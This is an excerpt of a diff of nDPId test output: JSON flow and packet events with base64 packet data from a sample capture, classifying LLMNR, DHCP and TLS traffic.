00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -399,7 +399,7 @@
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1470104406818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104406818,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfJ0LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgEaAAYABAAXABg="}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LSAAAAER5cXAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
@@ -418,10 +418,10 @@
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6kAAAER9H\/AqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAXcDK5AADMGDHZ36+tUwKgFEAG70J5BKvaX5fLLP1AQABsvzwAAgAIAAgAAAFMAAAANAABiYMcwiMXQzMiMgQcmWlJZkMqglFhQAPR2YgnQQP0K3ZKMosy0EuvkjMSi4tQS29AQN10LsmxnBTJKihm4DE3MDQwNTEwMjQAAAAD\/\/wAAAA0BAAZkbQ8Sj7Oe9PiiwBDc+0M3qnjgDK8RRxC4wMkMm6VV91C1Te+ybrzRLmHpyrK4bZavXIwADOQ6snm8v2H2p2SpH6m06PqK2eSoERX3TNfq7vb1Pveo7PONT9TnUXjkgVt2M1UumsUWGrLgq2GUvlzXvOPLaIXh2WGGxaNQtz1jFVdY+0zrpxEqy\/jQWU3QaN8euscIrVLF\/pkwWAOQct9fJHfuNC\/MfpPEwL\/1AnsUcAaC8\/sfjjx5DIP3T5+kLB\/ky5nWDGzJudLxL39BV679cN3TMGGwCiDjz8BUbsetnqmdz5nZf4AwUpqUBbDH0YbukYFxFpgWx1VK0Ft6NyauHZR77Fn6jjWPJxfrizISaNJJAw2Tqy9duTjvZ6O6coJr6d9MtTXf5qsYx+0KeK8uO221KMufGGsvUAI4YCgvPXVdW0lbCdk\/UWdvQk27qxkaA0bMmmtaoIM\/NdoPPcwHfYUfdLkSeX9aftPdhgNudr\/W5u4Rq9JCuxr+xSmkqaDqd6gSKkqRzGlbbbrcGyF7WGk\/8cG1vc2UHan62LkAAzJEJRwjhuFaCDyVcgr9Hf+VOCu\/WbKVvxixWZOd0y0FbTEIYK9xEk19sHm0uVaBKIvOw8BvnHM4ZoE15rgdy9cOuctKEI63utAOFOf2mQnsx+xGkU5azbbGL0YjiKG9XwO74XxdztUwcLqPr0\/JJmPPgPFoGSWqsm9ugxiAf+6FK5eJomztrl11jHLqcqmSu0amZJ2vzsr+HQ1yaBS8xhtHAlRjYL9oIKpApKM94hPIcq8aaGJEtzamTcDbtBQ1sMPcUE+yUtiBPrlnO9Nwt\/CiYfwjXLhAc57Nmo6vBWzUjss7w\/7Wb9k3zYdX1OxZgy1kvrBuG2WVHzF+IQ9Fq\/pk0IvbsQWQO2qMcnqAwwXAN5zFvFMTcfpV\/GRa6Cvc8ELP86S69D9ZpljWsaAmgFvinMLKj5eAujG5SXpnROjWsWKDhRiTv5p7M\/QvQ5PgsvnxYxwzTtmPmwT4v+9UIamloL6aH4y9ceyGZvFPH\/jOWhlPoGpWSmL8FxzRX8I0ZOH5h7GitpswaZPQenRLegoX\/pJNP3pcJ4kvc\/7oBU9eKhNCbKNIMLr0J2sgbcuo5DzP6xW+1KJlTpJay9bl5Pl0VPdVfr53CYdTOnDLEPtQAs8TDIA8+qWO4m2hTbvXTydzx3h6dgKZjr70r80ubfEhXRuxkxseun6pvNvpxyma0gxSfUYbMbRpJsPfd1POQDYxd1WsmLeynpzweBtMB4CyWpE7em97ncQfT+1jYPiU4C8h442mV+2iNebysC3+tj1kSc3iredU54VVSYsYiDJCTKDt1B72wPesWWs8H1oh07d+p8n6q\/HM+0on3oN8mliBSXdA4qo8xl+PnHCuSiNIcO9F46tn+Si8KqAsE1CoyxalnbQ2XoJdnf\/XNWrUBFQvGpTm8cA2xt6y\/B14Mse3ha6wLlYiZQnR\/q6to9f77axqkMdPEZxW8P1dQkKPv6RSZjX5So+geIVQBTjCtJ438tTlN+BBHx3i57FI5d8+OwESi4EeyLHH\/WufGNcvXF2wAiF6MIh3TqZipTbK\/sfxI05ZUV2K0zFjDFs3q+4O\/gCdO\/GR8NpL14qmcLw4hj2DUzElDJ7z58du\/sTLY9PL12tg2\/g4c+maPg6xMQhEEJZZ2fr0StLQ4dC8yRSCQ5AlLS4oj7J42WuPepbvvAkbIdKlT+5AXzJDvxJIA\/K5zy\/vGwU1kziWNYRVpFmlobTG1I2P3poiceReoPCxgxmEbNKxlIyxGeOkbT03xrhCy3M="}
00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAE7DK9AADMGERZ36+tUwKgFEAG70J5BKvxL5fLLP1AYABuy+gAAjZPukZZc5XVgQ9kkDb42wAG2R4wZPZK09D+mhXOPeysHqbaxc2ukLB7O\/ZQd+BiMnHFH7zgcREAoK8LsJtF9H0HTuFW4zAQpKNlDl6pGtEpiOY1HdxQ1Bv0HkLtvfY7Kkq4QCv1lSYlKLAPMR+Oc9r2t96JVS9ceghm\/Wm9DKfghBx740ADnGdTcU2OF\/8x6UPEOuW6wwYjs3Pb+yZn6sRfXdwloMkU3kuWbA\/HnEcEyg9N63JYWRugH0gCb7wJDNCrha78dJpq+nOGbkegYKzSRi8MebnxJxxwLRQs3jpRKSRVmH0ihWT6Ua9H97Rj8GCDKcrs8+ASvsIB+r3MFWznlQzQS834owopgMgpZRwgoXAU="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104410885,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoSVVAAEAGyILAqAUQd+vrVNCeAbvl8ss\/QSr9XlAQHmimXgAAAAAAAAAA"}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAXcDK5AADMGDHZ36+tUwKgFEAG70J5BKvaX5fLLP1AQABsvzwAAgAIAAgAAAFMAAAANAABiYMcwiMXQzMiMgQcmWlJZkMqglFhQAPR2YgnQQP0K3ZKMosy0EuvkjMSi4tQS29AQN10LsmxnBTJKihm4DE3MDQwNTEwMjQAAAAD\/\/wAAAA0BAAZkbQ8Sj7Oe9PiiwBDc+0M3qnjgDK8RRxC4wMkMm6VV91C1Te+ybrzRLmHpyrK4bZavXIwADOQ6snm8v2H2p2SpH6m06PqK2eSoERX3TNfq7vb1Pveo7PONT9TnUXjkgVt2M1UumsUWGrLgq2GUvlzXvOPLaIXh2WGGxaNQtz1jFVdY+0zrpxEqy\/jQWU3QaN8euscIrVLF\/pkwWAOQct9fJHfuNC\/MfpPEwL\/1AnsUcAaC8\/sfjjx5DIP3T5+kLB\/ky5nWDGzJudLxL39BV679cN3TMGGwCiDjz8BUbsetnqmdz5nZf4AwUpqUBbDH0YbukYFxFpgWx1VK0Ft6NyauHZR77Fn6jjWPJxfrizISaNJJAw2Tqy9duTjvZ6O6coJr6d9MtTXf5qsYx+0KeK8uO221KMufGGsvUAI4YCgvPXVdW0lbCdk\/UWdvQk27qxkaA0bMmmtaoIM\/NdoPPcwHfYUfdLkSeX9aftPdhgNudr\/W5u4Rq9JCuxr+xSmkqaDqd6gSKkqRzGlbbbrcGyF7WGk\/8cG1vc2UHan62LkAAzJEJRwjhuFaCDyVcgr9Hf+VOCu\/WbKVvxixWZOd0y0FbTEIYK9xEk19sHm0uVaBKIvOw8BvnHM4ZoE15rgdy9cOuctKEI63utAOFOf2mQnsx+xGkU5azbbGL0YjiKG9XwO74XxdztUwcLqPr0\/JJmPPgPFoGSWqsm9ugxiAf+6FK5eJomztrl11jHLqcqmSu0amZJ2vzsr+HQ1yaBS8xhtHAlRjYL9oIKpApKM94hPIcq8aaGJEtzamTcDbtBQ1sMPcUE+yUtiBPrlnO9Nwt\/CiYfwjXLhAc57Nmo6vBWzUjss7w\/7Wb9k3zYdX1OxZgy1kvrBuG2WVHzF+IQ9Fq\/pk0IvbsQWQO2qMcnqAwwXAN5zFvFMTcfpV\/GRa6Cvc8ELP86S69D9ZpljWsaAmgFvinMLKj5eAujG5SXpnROjWsWKDhRiTv5p7M\/QvQ5PgsvnxYxwzTtmPmwT4v+9UIamloL6aH4y9ceyGZvFPH\/jOWhlPoGpWSmL8FxzRX8I0ZOH5h7GitpswaZPQenRLegoX\/pJNP3pcJ4kvc\/7oBU9eKhNCbKNIMLr0J2sgbcuo5DzP6xW+1KJlTpJay9bl5Pl0VPdVfr53CYdTOnDLEPtQAs8TDIA8+qWO4m2hTbvXTydzx3h6dgKZjr70r80ubfEhXRuxkxseun6pvNvpxyma0gxSfUYbMbRpJsPfd1POQDYxd1WsmLeynpzweBtMB4CyWpE7em97ncQfT+1jYPiU4C8h442mV+2iNebysC3+tj1kSc3iredU54VVSYsYiDJCTKDt1B72wPesWWs8H1oh07d+p8n6q\/HM+0on3oN8mliBSXdA4qo8xl+PnHCuSiNIcO9F46tn+Si8KqAsE1CoyxalnbQ2XoJdnf\/XNWrUBFQvGpTm8cA2xt6y\/B14Mse3ha6wLlYiZQnR\/q6to9f77axqkMdPEZxW8P1dQkKPv6RSZjX5So+geIVQBTjCtJ438tTlN+BBHx3i57FI5d8+OwESi4EeyLHH\/WufGNcvXF2wAiF6MIh3TqZipTbK\/sfxI05ZUV2K0zFjDFs3q+4O\/gCdO\/GR8NpL14qmcLw4hj2DUzElDJ7z58du\/sTLY9PL12tg2\/g4c+maPg6xMQhEEJZZ2fr0StLQ4dC8yRSCQ5AlLS4oj7J42WuPepbvvAkbIdKlT+5AXzJDvxJIA\/K5zy\/vGwU1kziWNYRVpFmlobTG1I2P3poiceReoPCxgxmEbNKxlIyxGeOkbT03xrhCy3M="}
00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAE7DK9AADMGERZ36+tUwKgFEAG70J5BKvxL5fLLP1AYABuy+gAAjZPukZZc5XVgQ9kkDb42wAG2R4wZPZK09D+mhXOPeysHqbaxc2ukLB7O\/ZQd+BiMnHFH7zgcREAoK8LsJtF9H0HTuFW4zAQpKNlDl6pGtEpiOY1HdxQ1Bv0HkLtvfY7Kkq4QCv1lSYlKLAPMR+Oc9r2t96JVS9ceghm\/Wm9DKfghBx740ADnGdTcU2OF\/8x6UPEOuW6wwYjs3Pb+yZn6sRfXdwloMkU3kuWbA\/HnEcEyg9N63JYWRugH0gCb7wJDNCrha78dJpq+nOGbkegYKzSRi8MebnxJxxwLRQs3jpRKSRVmH0ihWT6Ua9H97Rj8GCDKcrs8+ASvsIB+r3MFWznlQzQS834owopgMgpZRwgoXAU="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104410885,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoSVVAAEAGyILAqAUQd+vrVNCeAbvl8ss\/QSr9XlAQHmimXgAAAAAAAAAA"}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1470104410914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104410914,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsew8LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgKoAAYABAAXABg="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1470104411327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411327,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7YAAAERvzfAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
@@ -439,31 +439,31 @@
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1470104413679,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413679,"pkt":"\/\/\/\/\/\/\/\/SNIkYwreCABFAAFIfjcAAEARNZ3AqAUp\/\/\/\/\/wBEAEMBNOoXAQEGAAJEmkEAAIAAwKgFKQAAAAAAAAAAAAAAAEjSJGMK3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBSNIkYwreDAhrZXZpbi1QQzwITVNGVCA1LjA3DQEPAwYsLi8fIXn5K\/z\/AAAAAAAAAAAAAAAA"}
00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}}
00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1470104413815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413815,"pkt":"TF4M6gNlYMVHBbyMCABFAAFIqYMAAEAR0r\/AqAUQwKh3AQBEAEMBNFvwAQEGABeXwM0AAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5